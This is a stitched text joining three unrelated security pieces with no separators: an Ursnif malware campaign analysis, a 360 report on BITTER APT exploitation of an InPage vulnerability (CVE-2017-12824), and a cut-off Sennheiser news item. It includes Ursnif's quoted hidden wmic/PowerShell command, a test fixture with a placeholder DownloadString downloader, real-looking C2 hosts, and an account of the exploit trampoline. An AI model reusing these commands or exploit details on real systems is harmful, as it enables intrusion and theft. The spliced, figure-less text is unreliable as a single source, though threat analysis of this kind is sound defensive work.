
Tracking and analysis of a new Ursnif trojan campaign


Overview

On October 9, several of our customers generated the same alert event within a few hours of each other. Based on previously observed malicious activity, this series of alerts appeared to be linked to the Ursnif trojan. Ursnif is a long-active piece of malware whose roots trace back to ZeuS and SpyEye in 2007, and it has shown strong infection capability in every campaign it has been part of. The vector for this series of attacks was email carrying malicious Word documents.

After the initial notification, our threat intelligence team immediately began an in-depth investigation to determine whether this series of activity was related to the campaign we monitored in the second quarter of this year.

Initial assessment

Although we cannot confirm that the campaign targeted a specific geographic region, we noticed that most of the files were aimed at Italian-speaking users, which suggests that Italy received the attackers' attention. In addition, we found malware download locations in Russia, Ukraine, the Netherlands and the United States. We focused our analysis on the threat faced by Italian customers at the time of the attack.

The document attached to the email contains an Italian-language prompt that lures the user into enabling macros in order to view the content:


Ursnif infection tactics

As part of the Ursnif campaign, the DOC document uses the pretext that "this document was created with an earlier version of Microsoft Office Word" to ask the user to enable macros. If the user has already enabled macros beforehand, the macro executes as soon as the document is opened; if not, the malicious code runs immediately after the user clicks the "Enable Content" button.

In the DOC file we found the obfuscated macro code:


The macro in Microsoft Word launches a command prompt and invokes PowerShell with the -ec parameter to decode an instruction whose purpose is to download the payload. The figure below shows the process chain after the macro in the Microsoft Word document runs.

After de-obfuscation and Base64 decoding, the command is as follows:


The process chain after the Microsoft Word document macro executes:


In this particular Ursnif campaign, the payloads are named with an incrementing number from 1 to 7 (for example wync1, wync5, wync7) and the extension ".xap".

Ursnif drop-point structure:


After Ursnif runs cmd.exe, we use ReaQta-Hive's behaviour tree to view its activity:


Via cmd.exe, powershell.exe is run first (analysis window #1), then the executable is dropped and run (analysis windows #2, #3); this is the final Ursnif payload. After the final payload executes, the malware begins its malicious behaviour: it creates a registry key used to store the next stage of the infection.


After creating the registry key, Ursnif starts a process using the command stored in the "dhcpport" value:

C:\\windows\\system32\\wbem\\wmic.exe /output:clipboard process call create \"powershell -w hidden iex([System.Text.Encoding]::ASCII.GetString((get-itemproperty 'HKCU:\\Software\\AppDataLow\\Software\\Microsoft\\B53CC69F-9026-AF48-42B9-C45396FD3837').bthppast))

The whole process can be seen directly in the figure below:


This command runs PowerShell, which then uses invoke-expression to read and execute the content of "bthppast" (analysis window #1):


The stored value is a PowerShell script that runs directly in memory. Without going into further depth, the fileless attack selects the .dll matching the current architecture and injects code into Explorer (analysis window #2); the value can be "Client32" or "Client64".


After injection, the malicious code in explorer.exe attempts to connect to the C&C server (analysis window #7).
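Detection logic for the chain just described, written as an added example rather than code from the original post or from ReaQta: it tags process-creation events for the Office-spawned shell, the encoded PowerShell downloader, wmic.exe proxy execution and the hidden PowerShell that reads its next stage from HKCU:\Software\AppDataLow. The events are constructed in a simplified Sysmon-like shape, and the encoded command decodes to a placeholder URL, not the real downloader.

```python
"""Tag process-creation events that match the Ursnif chain: Office -> cmd.exe ->
PowerShell -ec, then wmic.exe "process call create" spawning a hidden PowerShell
(under WmiPrvSE.exe) that iex's a value stored below HKCU:\\Software\\AppDataLow.
Added example; the sample events are constructed, not real telemetry."""
import base64
import re
from typing import Dict, List, Optional

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}
ENC_FLAG = re.compile(r"-(?:ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
WMIC_CREATE = re.compile(r"process\s+call\s+create", re.I)
HIDDEN = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext of a PowerShell -ec/-EncodedCommand argument, if any.
    PowerShell expects Base64 of UTF-16LE text; anything else is not an -ec payload."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(ev: Dict[str, str]) -> List[str]:
    """Tag one event with the Ursnif behaviours it matches (order is fixed)."""
    image = ev["image"].lower()
    parent = ev["parent_image"].lower()
    cmd = ev["cmdline"]
    tags: List[str] = []
    if parent in OFFICE_APPS and image in SHELLS:
        tags.append("office-spawned-shell")            # macro -> cmd/powershell
    decoded = decode_encoded_command(cmd)
    if image == "powershell.exe" and decoded is not None:
        tags.append("encoded-powershell")
        if re.search(r"https?://", decoded, re.I):
            tags.append("encoded-downloader")          # stage download hidden in -ec
    if image == "wmic.exe" and WMIC_CREATE.search(cmd) and "powershell" in cmd.lower():
        tags.append("wmic-proxy-execution")            # wmic process call create "powershell ..."
    if (image == "powershell.exe" and parent == "wmiprvse.exe"
            and HIDDEN.search(cmd) and "iex" in cmd.lower()
            and "appdatalow" in cmd.lower()):
        tags.append("registry-staged-fileless")        # iex of a value under AppDataLow
    return tags


def detect(events: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Run classify over a batch; return pid -> tags for matching events only."""
    hits: Dict[str, List[str]] = {}
    for ev in events:
        tags = classify(ev)
        if tags:
            hits[ev["pid"]] = tags
    return hits


# Constructed sample telemetry (not real events). The -ec payload is a placeholder.
_PLACEHOLDER = "iex (New-Object Net.WebClient).DownloadString('http://example.invalid/wync3.xap')"
_ENC = base64.b64encode(_PLACEHOLDER.encode("utf-16-le")).decode()
# The wmic command line quoted in the post (registry value "dhcpport"), basename only.
_WMIC = ('wmic.exe /output:clipboard process call create "powershell -w hidden '
         "iex([System.Text.Encoding]::ASCII.GetString((get-itemproperty "
         "'HKCU:\\Software\\AppDataLow\\Software\\Microsoft\\B53CC69F-9026-AF48-42B9-C45396FD3837').bthppast))\"")
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"pid": "100", "image": "WINWORD.EXE", "parent_image": "explorer.exe",
     "cmdline": "WINWORD.EXE /n Logisticaservicesrl.doc"},
    {"pid": "101", "image": "cmd.exe", "parent_image": "WINWORD.EXE",
     "cmdline": "cmd /c powershell -ec " + _ENC},
    {"pid": "102", "image": "powershell.exe", "parent_image": "cmd.exe",
     "cmdline": "powershell -ec " + _ENC},
    {"pid": "103", "image": "wmic.exe", "parent_image": "payload.exe",  # constructed parent name
     "cmdline": _WMIC},
    # Win32_Process.Create spawns the child under WmiPrvSE.exe, not under wmic.exe.
    {"pid": "104", "image": "powershell.exe", "parent_image": "WmiPrvSE.exe",
     "cmdline": _WMIC.split("create ", 1)[1].strip('"')},
    {"pid": "105", "image": "svchost.exe", "parent_image": "services.exe",
     "cmdline": "svchost.exe -k netsvcs"},
]
```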

C&C infrastructure

All the servers we analysed share the same pattern and file structure. The base directory used by the attackers appears to be common within a single campaign. In addition, there are three subdirectories used to collect user information, such as:

malware downloaded by potential victims;

victim IP address;

country;

blocked IP addresses;

bot host HID;

bot version;

uptime.

The root directory can be customised in the malware's management panel. In the past we have seen Ursnif campaigns use the same file structure with files located under different root folders, for example "TOL", "TYJ", "YUY" and "MXE". The same root folder name does not appear to be reused across campaigns, and each name is used only for a limited time.

The root folder name assigned to a distribution server appears to be tightly bound to each campaign. We have collected these folder names since August 2018; each campaign used a unique folder name.

WES: from November 5 to the present;

TJY: from October 29 to November 5;

RUI: from October 16 to October 28;

TNT: from August 22 to October 11;

TOL: from October 1 to October 6;

MXE: from September 24 to October 1;

VRE: from September 20 to September 21;

DAB: from September 17 to September 21;

XOE: from September 13 to September 14;

RTT: from September 6 to September 12;

YUY: from August 24 to September 6;

TST: from August 20 to August 22;

FLUX: from August 13 to August 15.

The figure below shows the configuration of the Ursnif executable, including bot version, botnet group ID, DGA (domain generation algorithm) data, C&C servers and so on.

Ursnif bot configuration:


Shortly after the payload establishes a connection with the hard-coded C&C address, a payload is downloaded and executed automatically. As part of the data exfiltration process, an .avi file (random file name) is downloaded from the hard-coded address; the URL contains information about the target host, which is encoded before being sent.

Data exfiltration process:

This C&C server is managed with the notorious crimeware panel used by the original Ursnif group; its login page is at wifilhonle[.]com/auth/login.

From the "Clients" section of the panel, the Ursnif group can monitor hosts successfully infected with the trojan. This page shows statistics about victim machines, including IP address, country of the infected machine, information status and trojan version.


Ursnif distribution

As mentioned earlier, the C&C servers are concentrated in Ukraine, Russia, the Netherlands, the United States and Italy.


The figure below shows statistics on the hourly sample download rate of the hosting servers. The analysis was conducted between November 7 and November 12, 2018 and is based on 162,493 samples served by the malicious servers. Interestingly, each downloaded sample is automatically patched before delivery so that every binary has a unique hash, which is likely a simple way to evade hash-based IoC detection.


Summary

Without doubt, the Ursnif trojan remains one of the most active threats today. The combination of LOLBins and fileless techniques makes Ursnif harder to detect and lets it slip more easily past antivirus scans.

AI-driven behavioural analysis plays a central role in proactively detecting this kind of threat, and Ursnif is a good example. Today, detecting and removing malicious activity is a race against time: every second of delay adds to the risk of losing critical business information.

With a system such as ReaQta-Hive, new threats and their variants can be detected quickly, information about their behaviour and associated risk factors can be reconstructed, and potential threats can be detected, alerted on and blocked before the malware causes any real damage.

IoC

SHA1 hashes of the DOC documents:


SHA1 hashes of the EXE files:


Payload servers and C&C servers:

The BITTER (蔓灵花) APT group's attacks on Pakistan using an InPage software vulnerability, and analysis of links to other groups

Overview

Recently, the 360 Threat Intelligence Center observed a series of targeted attacks against Pakistan. The related malicious programs are mainly delivered via decoy documents (.inp) that exploit CVE-2017-12824, a vulnerability in the InPage word processor; the campaign also used Office CVE-2017-11882 exploit documents. InPage is a word processor designed specifically for Urdu speakers (Urdu is the national language of Pakistan). Kaspersky first publicly disclosed a targeted attack exploiting a vulnerability in this software in November 2016 [6], while in-the-wild attacks exploiting this word processor can be traced back to June 2016 [14].

By analysing this batch of InPage exploit documents and the related attack activity, we linked the group behind them to the "BITTER" APT group that 360 disclosed in 2016 [5]. Further analysis shows that several samples from the campaign also have strong connections with the Patchwork (摩诃草), Bahamut and Confucius APT groups, which raises further questions about the common origin of these South Asian APT groups.

Timeline

The 360 Threat Intelligence Center has compiled the key events in targeted attacks exploiting the InPage vulnerability over the past two years:

InPage vulnerability analysis (CVE-2017-12824)

The detection results on VirusTotal for the InPage exploit document used in the vulnerability analysis are as follows:


InPage is a word processor designed for Urdu speakers; the vulnerability involved in the related in-the-wild attack samples is CVE-2017-12824.

The 360 Threat Intelligence Center's analysis found that the vulnerability arises because the InPage word processor does not check the data type (Type) to be processed when parsing a document stream, leading to an out-of-bounds read; a specially crafted InPage document can trigger arbitrary code execution.

We analysed the vulnerability in detail in an InPage 2015 environment; the process is as follows.

Figure: InPage 2015

Root cause: out-of-bounds read

The essence of CVE-2017-12824 is an out-of-bounds read. When processing the InPage100 stream in a document, the InPage word processor does not check the data type (Type) to be handled, and that Type is specified by a field in the InPage document. An attacker can therefore set a value outside the valid Type range to cause an out-of-bounds read in InPage.

The key data structure in the exploit document (.inp) that triggers the vulnerability is shown below. 0x7E and 0x72 each represent a Type in the document stream to be processed; we label 0x7E as Type1 and 0x72 as Type2:


The main steps by which InPage processes an .inp file are as follows:

InPage first calls Ole!StgCreateDocfile to parse the entire .inp file, then calls Ole!COleStreamFile::OpenStream to open the InPage100 data stream in the document:


All processing logic related to the InPage100 stream takes place in the function PraseInPage100_432750, which uses the callback InPage100Read_440ED0 to read data from the stream:


Finally, the function sub_453590 processes the Type data that triggers the vulnerability, namely the 0x7E and 0x72 mentioned above. In the figure below, buf is the data containing the Type, read via InPage100Read_440ED0:


The vulnerable function sub_453590 selects the handling routine according to Type1 and Type2 (the two bytes 0x7E and 0x72): it first uses Type1 to fetch a function-pointer array, then uses Type2 to read a function pointer from that array, and finally calls that function to process the data:


Let us look at the assignment and range of dword_656A28 from the figure above:


We can see that when processing the exploit document, Type1 = ECX(0x1F8)>>2 = 0x7E (126) and Type2 = EDI (0x72):

Looking up the assignment of dword_656A28[0x7E] in IDA Pro:

We can see that the actual size of the dword_656E60 array is 30 (0x1E):

Because Type2 in the exploit document is set to 0x72, i.e. EDI = 0x72, and InPage does not validate the size of the incoming Type2, the program accesses dword_656E60[0x72]; since 0x72 > 30 (0x1E), an out-of-bounds read occurs.

Exploitation

Because the attacker set Type2 in the document to 0x72, the address calculation results in an out-of-bounds access that lands on the code at address 0x00455AFA:

We can see that dword_656E60[0x72] (0x455AFA) happens to be a pop retn instruction sequence:

This pop retn sequence serves as a "trampoline". When the Type handling function is executed, the argument passed in (pointer 0x031E383F) happens to point at a data stream in the InPage document; the attacker can fill this controllable data stream with shellcode, so that once pop retn executes, control returns directly into the attacker's shellcode:


The InPage program has neither DEP nor ASLR enabled, so the shellcode executes directly:
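A Python model of the dispatch in sub_453590 and of the bounds check it lacks, added here as an example; it is not InPage's code nor code from the original report. The addresses 0x656A28, 0x656E60 and 0x455AFA and the table size 0x1E are taken from the analysis above; the handler addresses that fill the table and the record layout used by types_from_record are constructed assumptions.

```python
"""Model of the CVE-2017-12824 two-level handler lookup: dword_656A28[Type1]
yields a 30-entry function-pointer table (dword_656E60), which is then indexed by
Type2 with no range check. Memory is a constructed dword-addressable image."""
import struct
from typing import Dict, Tuple

DWORD = 4
TABLE_SIZE = 0x1E          # real size of dword_656E60 (30 entries), from the analysis
OUTER_TABLE = 0x656A28     # dword_656A28: indexed by Type1
INNER_TABLE = 0x656E60     # dword_656E60: indexed by Type2
TRAMPOLINE = 0x455AFA      # the pop; retn gadget that dword_656E60[0x72] resolves to


def build_memory() -> Dict[int, int]:
    """Constructed data-section image. Only the facts on the page are mapped:
    Type1 0x7E -> the 30-entry table, and the dword found at slot 0x72."""
    mem: Dict[int, int] = {}
    # Type1 = 0x7E is stored as the byte offset 0x1F8 (0x7E * 4), matching ECX>>2.
    mem[OUTER_TABLE + 0x7E * DWORD] = INNER_TABLE
    # 30 legitimate handler addresses (constructed stand-in values).
    for i in range(TABLE_SIZE):
        mem[INNER_TABLE + i * DWORD] = 0x440000 + i * 0x10
    # Whatever the linker placed 0x1C8 bytes past the table: the page shows 0x455AFA.
    mem[INNER_TABLE + 0x72 * DWORD] = TRAMPOLINE
    return mem


def read_dword(mem: Dict[int, int], addr: int) -> int:
    """Read one dword; unmapped addresses raise instead of silently faulting."""
    if addr not in mem:
        raise LookupError(f"unmapped read at {addr:#x}")
    return mem[addr]


def resolve_handler_unchecked(mem: Dict[int, int], type1: int, type2: int) -> int:
    """Mirrors sub_453590 as analysed: no range check on Type2 (the bug).
    A file-controlled Type2 of 0x72 reads past the table and returns 0x455AFA."""
    table = read_dword(mem, OUTER_TABLE + type1 * DWORD)
    return read_dword(mem, table + type2 * DWORD)


def resolve_handler_checked(mem: Dict[int, int], type1: int, type2: int) -> int:
    """The check the analysis says is missing: Type2 must index inside the table.
    Type1 is also validated against the mapped outer table (assumed layout)."""
    if not 0 <= type2 < TABLE_SIZE:
        raise ValueError(f"Type2 {type2:#x} out of range (table has {TABLE_SIZE} entries)")
    outer = OUTER_TABLE + type1 * DWORD
    if outer not in mem:
        raise ValueError(f"Type1 {type1:#x} has no handler table")
    return read_dword(mem, read_dword(mem, outer) + type2 * DWORD)


def types_from_record(buf: bytes) -> Tuple[int, int]:
    """Derive Type1/Type2 as the analysis describes: Type1 = field >> 2
    (0x1F8 >> 2 == 0x7E) and Type2 is a single byte. The record layout
    (u16 LE field followed by one byte) is an assumption for this example."""
    field, type2 = struct.unpack_from("<HB", buf, 0)
    return field >> 2, type2
```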


Analysis of the four attack frameworks exploiting the InPage vulnerability

The 360 Threat Intelligence Center analysed in detail the samples recently used in targeted attacks against Pakistan that exploit the InPage vulnerability, and found that the generation time, InPage100 stream size, initial shellcode and stream tags of this batch of exploit samples are all identical; it is almost certain that this series of exploit samples shares the same origin.


Through analysis of this batch of InPage exploit documents and the related malicious code, we found that the malicious code carried by the exploit documents uses four different attack frameworks, i.e. four completely different backdoor programs. The analysis follows.

wscspl full-featured backdoor

A CVE-2017-12824 exploit document captured by the 360 Threat Intelligence Center, a decoy named "SOP for Retrieval of Mobile Data Records.inp", ultimately downloads and executes a full-featured backdoor named wscspl.

Information about the exploit document:

MD5: 863f2bfed6e8e1b8b4516e328c8ba41b
File name: SOP for Retrieval of Mobile Data Records.inp

ShellCode

After the vulnerability is triggered, the shellcode locates the main shellcode by searching for the marker "27862786", then downloads the payload from khurram.com.pk/js/drv, saves it to c:\conf\Smss.exe and executes it:

Downloader
MD5: c3f5add704f2c540f3dd345f853e2d84
Compile time: 2018.9.24
PDB path: C:\Users\Asterix\Documents\VisualStudio2008\Projects\28NovDwn\Release\28NovDwn.pdb

The downloaded EXE is mainly used to communicate with the C2 and fetch other modules to execute. After running, it first sets a registry value (key: HKCU\Environment, value name: AppId, data: c:\intel\drvhost.exe):


It then achieves persistence by adding itself to the registry autostart entries:


It checks whether the current process path is c:\intel\drvhost.exe; if not, it copies itself to that path and executes the copy:


Once the process path satisfies the condition, it obtains the machine GUID, computer user name and other information from the registry, encrypts them and concatenates them into a string:


It then sends the constructed string to the C2 nethosttalk.com and fetches commands to execute:


The C2 server returns an instruction beginning with "AXE:#"; the local program checks whether the instruction contains "#" or "." to determine whether there is a further trojan plugin to download and execute:


If "AXE:#" is followed by string content, that plugin is downloaded and executed.


During debugging by 360 Threat Intelligence Center analysts, we successfully obtained an executable plugin named "wscspl":

Backdoor wscspl
MD5: 1c2a3aa370660b3ac2bf0f41c342373b
Compile time: 2018.9.13
Original file name: winsvc.exe

The functionality of this main trojan matches that of the trojan used by the "BITTER" APT group disclosed by 360 in 2016 [5]. The trojan supports 17 commands, including uploading the drive list, searching for, reading and creating specified files, enumerating the process list and terminating specified processes. Analysis of its functionality follows:

After the trojan runs, it sets two timers with a 10-second interval:

Timer 1: responsible for resolving the IP of the C&C wcnchost.ddns.net; if the request succeeds, it saves the IP to a global variable and sets a flag variable to 1:

Timer 2: checks the flag variable; if it is 1, it attempts to connect to the C&C:

It then creates two threads:

Thread 1: checks the connection state with the C&C; if connected successfully, it receives and executes C&C commands.

Thread 2: checks whether the global variable dword_C9618 contains data; if so, it sends that data to the C&C.

The command execution code fragment is as follows:


All of the trojan's commands and their functions are listed in the table below:

3000  Get RAT status information
3001  Get computer hard disk information
3002  Get the file list of a specified directory
3004  Get RAT log 1
3005  Create a specified file
3006  Write data to the created file
3007  Open a specified file
3009  Read the content of a specified file
3012  Create a remote console
3013  Execute a remote command
3015  Get RAT log 2
3016  Terminate the remote console
3017  Close a specified handle
3019  Get processes with active UDP connections
3021  Get RAT log 3
3032  Terminate a specified process
3023  Get information on system processes
3025  Get RAT log 4

Visual Basic backdoor

Another captured CVE-2017-12824 exploit document, named "AAT national assembly final.inp", drops and executes a backdoor written in Visual Basic.

Information about the exploit document:

MD5: ce2a6437a308dfe777dec42eec39d9ea
File name: AAT national assembly final.inp

ShellCode

After the vulnerability is triggered, the shellcode first locates the main shellcode by searching memory globally for the string "LuNdLuNd":


After locating the main shellcode, it resolves the API functions it needs and creates the mutex "QPONMLKJIH" to ensure that only one instance runs:


It then extracts a DLL module embedded in the document and executes it by loading it in memory:

Dropper
MD5: 43920ec371fae4726d570fdef1009163
PDB path: c:\users\mz\documents\visualstudio2013\Projects\Shellcode\Release\Shellcode.pdb

The memory-loaded DLL is a dropper containing two resources, "Bin" and "Bin2":


Bin is the Visual Basic backdoor, while Bin2 is the benign .inp decoy file that is dropped and opened after the exploit triggers. The decoy document looks like this:

Backdoor smtpldr.exe
MD5: 694040b229562b8dca9534c5301f8d73
Compile time: 2018.7.4
Original file name: smtpldr.exe

The Bin file is a backdoor written in Visual Basic, mainly used to fetch and execute commands. After running, the trojan first reads the names of the applications installed on the system from "SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\":


It then checks whether the installed applications include antivirus products such as Kaspersky, Norton or Trend Micro:


It then runs the WMI query select * from win32_computersystem to obtain system information and detects a virtual machine environment by checking whether the name contains "virtual":


If it detects a virtual machine environment, it shows a dialog saying "not a valid file" and exits:


If the checks pass, it creates "SMTP Loader.lnk" in the %Start% directory for autostart:


Finally it communicates with the C&C referfile.com to fetch further instructions to execute:

Delphi backdoor

Through its big-data platform, the 360 Threat Intelligence Center also linked a batch of backdoors written in Delphi that are likewise spread via InPage exploit documents. Sample information:

MD5: fec0ca2056d679a63ca18cb132223332
Original file name: adobsuit.exe

Like the Visual Basic backdoor, the captured Delphi backdoor is dropped from a resource by a similar dropper and achieves persistence by creating an "Adobe creative suit.lnk" file in the %Start% directory that points to itself:


The backdoor creates a users.txt file in the %Document% folder and writes a random 30-byte string to it:


The trojan obtains the computer user name, encrypts it and saves it to %Document%/SyLog.log:


It then communicates with the C2 errorfeedback.com, sending the content of SyLog.log via POST:


When the C2 returns Success, it contacts the C2 again with an HTTP GET request; if a string is returned, it downloads and executes the next payload from "errorfeedback.com/ MarkQuality455 /TTGKWoFdyQHEwpyYKmfVGtzQLfeqpJ /<string>":

Cobalt Strike backdoor

Another captured InPage exploit document ultimately executes a backdoor generated by Cobalt Strike. Document information:

MD5: 74aeaeaca968ff69139b2e2c84dc6fa6
File type: InPage exploit document
Discovered: 2018.11.02

ShellCode

After the vulnerability triggers, the shellcode first locates the main shellcode via the marker "LuNdLuNd", then loads the attached DLL in memory and executes it.

Dropper
MD5: ec834fa821b2ddbe8b564b3870f13b1b
PDB path: c:\users\mz\documents\visualstudio2013\Projects\Shellcode\Release\Shellcode.pdb

Like the Visual Basic and Delphi backdoors above, the memory-loaded DLL drops the trojan file from a resource and executes it:

Downloader winopen.exe
MD5: 09d600e1cc9c6da648d9a367927e6bff
Compile time: 2018.10.12

The dropped downloader is named winopen.exe. It fetches an encrypted file with a valid JPEG header from jospubs.com/foth1018/simple.jpg; if successful, it decrypts the data starting from the 49th byte of the JPEG file by XORing with 0x86:
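A decoder for the staged file format just described (JPEG header, payload XORed with 0x86 from the 49th byte), as an added example for analysts rather than code from the report or from the malware; it assumes "49th byte" is counted from 1 (offset 48) and the sample blob is constructed.

```python
"""Decode a winopen.exe-style stage: a blob that starts with a genuine JPEG
header and carries the next stage XOR-encrypted with 0x86 from byte 49 onward.
Added example; the offset convention and the test blob are assumptions."""
from typing import Optional

JPEG_SOI = b"\xff\xd8\xff"   # start-of-image marker every JPEG begins with
PAYLOAD_OFFSET = 48          # assumption: "49th byte" counted from 1
XOR_KEY = 0x86


def decode_stage(blob: bytes) -> bytes:
    """Validate the JPEG header, then XOR-decode everything past the offset.
    Rejects non-JPEG input and blobs too short to carry a payload."""
    if not blob.startswith(JPEG_SOI):
        raise ValueError("not a JPEG: missing SOI marker")
    if len(blob) <= PAYLOAD_OFFSET:
        raise ValueError("blob too short to carry a payload")
    return bytes(b ^ XOR_KEY for b in blob[PAYLOAD_OFFSET:])


def looks_like_pe(data: bytes) -> bool:
    """Sanity check: the decoded stage is expected to be a DLL (MZ header)."""
    return data[:2] == b"MZ"


def extract(blob: bytes) -> Optional[bytes]:
    """Return the decoded stage only if it decodes and looks like a PE."""
    try:
        stage = decode_stage(blob)
    except ValueError:
        return None
    return stage if looks_like_pe(stage) else None


def make_sample(payload: bytes) -> bytes:
    """Build a constructed blob in this format for testing (not a real sample):
    SOI marker, zero padding up to the offset, then the XOR-encrypted payload."""
    header = JPEG_SOI + b"\x00" * (PAYLOAD_OFFSET - len(JPEG_SOI))
    return header + bytes(b ^ XOR_KEY for b in payload)
```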



The decrypted file is a DLL, which is then loaded and executed. The DLL first checks its runtime environment, testing whether the process that loaded it is rundll32.exe:


If the loading process is not rundll32.exe, it drops a backdoor named aflup64.dll under C:\ProgramData\Adobe64:


It then creates start.lnk in the Startup folder; the LNK target is rundll32.exe "C:\\ProgramData\\Adobe64\\aflup64.dll",IntRun, which provides autostart:


Finally it launches rundll32.exe to load aflup64.dll and call its export IntRun:

Backdoor aflup64.dll
MD5: 91e3aa8fa918caa9a8e70466a9515666
Compile time: 2018.10.12

The export IntRun repeats the earlier behaviour: it fetches the JPEG file, XOR-decrypts it and executes the result. Because it is launched via rundll32, it takes the other branch, first creating the mutex "9a5f4cc4b39b13a6aecfe4c37179ea63":


It then creates the file "nnp74DE.tmp" in the %TEMP% directory, runs the commands tasklist, ipconfig ./all and dir to collect process, network and file-listing information, and saves the collected information into "nnp74DE.tmp":


It then obtains the machine ID, system version and current system time, concatenates all collected information with the prefix "tag FluffyBunny", Base64-encodes it, connects to the C&C and uploads it:


After the information is transmitted successfully, the server returns the Base64 encoding of the string "OK":


If the check-in request fails, it retries in a loop. After a successful check-in it enters the second stage, sending the Base64-encoded computer name-user name to jospubs/foth1018/go.php and fetching commands to execute:


The commands it can receive use the format "number:argument"; five commands are supported, listed below:

Command ID  Function
103  Download a plugin to the %TEMP% directory and execute it
105  Fetch a file and load it in memory
115  Fetch the content of the argument file
117  Delete Start.lnk
120  Download a file to the %temp% directory and delete Start.lnk

Plugin jv77CF.tmp
MD5: c9c1ec9ae1f142a8751ef470afa20f15
Compile time: 2018.4.3

During debugging, 360 Threat Intelligence Center analysts successfully obtained a trojan plugin that is written to disk and executed. The plugin continues to fetch an encrypted file from pp5.zapto.org:


Once fetched, it is XOR-decrypted and executed; the decrypted file is a remote-control backdoor generated by Cobalt Strike:

Analysis of attack samples exploiting CVE-2017-11882

By pivoting on the 360 Threat Intelligence Center's big-data platform, we found an Office CVE-2017-11882 exploit document belonging to the same series of attacks. The document is named "SOP for Retrieval of Mobile Data Records.doc", the same name as the InPage exploit document that drops the wscspl trojan (shared with BITTER), except that this document targets Microsoft Office.

MD5: 61a107fee55e13e67a1f6cbc9183d0a4
File name: SOP for Retrieval of Mobile Data Records.doc

Information about the vulnerable Objdata object:


After the exploit triggers, it fetches the next payload from the same download address used by the SOP for Retrieval of Mobile Data Records.inp (InPage) exploit file:

Attribution and connections

By analysing this batch of InPage exploit documents and the related attack activity, the 360 Threat Intelligence Center linked the group behind the targeted attacks using the wscspl backdoor to the BITTER (蔓灵花) APT group disclosed by 360 in 2016 [5]. Further analysis shows that several samples from this series of attacks also have strong connections with the Patchwork (摩诃草), Bahamut and Confucius APT groups.

BITTER (蔓灵花) APT group

After in-depth analysis of several of the more recent InPage exploit documents, the 360 Threat Intelligence Center found that the trojan ultimately dropped by these documents is the backdoor used by the BITTER APT group exposed by 360 in 2016 [5], namely the wscspl full-featured backdoor analysed above.

Furthermore, several of the C&C addresses are also strongly associated with the BITTER APT group in the 360 Threat Intelligence Center's internal analysis platform; these C&C addresses have been used repeatedly in attacks against China. The related attack activity can therefore be confirmed as the work of BITTER.

Connection with Confucius

The C&C address errorfeedback.com used in the Delphi backdoor framework appears in Trend Micro's investigation of the similarity between Confucius and Patchwork [10], where Trend Micro disclosed the domain as used by Confucius.

Connection with Patchwork (摩诃草)

Through the in-depth analysis and correlation of the Delphi backdoor framework above, we also found that this attack framework and its samples appeared in the InPage attack samples analysed by Palo Alto in 2017 [13]; Palo Alto considered the framework and backdoor to be possibly related to Patchwork.

Connection with Bahamut

The 360 Threat Intelligence Center found that the trojan ultimately executed by one of the exploit documents in the campaign, "AAT national assembly final.inp" (the Visual Basic backdoor), uses the domain referfile.com as its C2. That C2 was disclosed in Cisco Talos's July 2018 report on a targeted campaign against iOS users in India [9]; Talos found that the domain was likewise used by a Visual Basic backdoor, and that the related network assets appear to belong to the Bahamut APT group.
Summary and speculation

After analysing a series of attack samples against Pakistan from the same source (exploit documents sharing generation time, shellcode, InPage100 stream size and fixed stream features), the 360 Threat Intelligence Center found that samples from this single source used at least four different malicious code frameworks, each with some degree of connection to the BITTER (蔓灵花), Patchwork (摩诃草), Confucius and Bahamut APT groups. Perhaps these APT groups belong to a single organisation? Or perhaps they share the same source of digital weapons (a sponsor behind the APT groups distributing the same exploit generator tool to these teams)?

Below is a brief comparison of the TTPs of the APT groups covered in this article, prepared by the 360 Threat Intelligence Center for reference:

Group: BITTER (蔓灵花)
  Targets: China, Pakistan
  Platforms: PC/Android
  Malware implementation: C
  Attack entry: spear phishing

Group: Patchwork (摩诃草)
  Targets: mainly China, Pakistan
  Platforms: PC/Android
  Malware implementation: Delphi/C#
  Attack entry: social networks, spear phishing

Group: Confucius
  Targets: South Asia
  Platforms: PC/Android
  Malware implementation: Delphi
  Attack entry: social networks

Group: Bahamut
  Targets: South Asia (mainly Pakistan), Middle East
  Platforms: PC/Android/iOS
  Malware implementation: Delphi/VB
  Attack entry: social networks, spear phishing

References

[1] https://ti.360.net/
[2] http://www.inpage.com/
[3] https://en.wikipedia.org/wiki/InPage
[4] https://ti.360.net/blog/articles/analysis-of-apt-campaign-bitter/
[5] https://www.anquanke.com/post/id/84910
[6] https://www.kaspersky.com/blog/inpage-exploit/6292/
[7] https://cloudblogs.microsoft.com/microsoftsecure/2018/11/08/attack-uses-malicious-inpage-document-and-outdated-vlc-media-player-to-give-attackers-backdoor-access-to-targets/
[8] https://blog.talosintelligence.com/2018/07/Mobile-Malware-Campaign-uses-Malicious-MDM.html
[9] https://blog.talosintelligence.com/2018/07/Mobile-Malware-Campaign-uses-Malicious-MDM-Part2.html
[10] https://blog.trendmicro.com/trendlabs-security-intelligence/confucius-update-new-tools-and-techniques-further-connections-with-patchwork/
[11] https://documents.trendmicro.com/assets/appendix-confucius-update-new-tools-techniques-connections-patchwork-updated.pdf
[12] https://researchcenter.paloaltonetworks.com/2016/09/unit42-confucius-says-malware-families-get-further-by-abusing-legitimate-websites/
[13] https://researchcenter.paloaltonetworks.com/2017/11/unit42-recent-inpage-exploits-lead-multiple-malware-families/
[14] https://www.virustotal.com/gui/file/9bf55fcf0a25a2f7f6d03e7ba6123d5a31c3e6c1196efae453a74d6fff9d43bb/submissions

Sennheiser patches software that allowed for security certificate spoofing


Why it matters: Connecting to a site with HTTPS gives users a sense of privacy and security. For users of Sennheiser's HeadSetup software, a flaw allowed for false certificates to be installed while appearing legitimate, giving way to man-in-the-middle attacks.

A flaw in Sennheiser's HeadSetup software that works with the company's headphones has been discovered that allows for man-in-the-middle attacks to be carried out. German consulting firm Secorvo has published a vulnerability report and Sennheiser has updated its software to eliminate the threat.

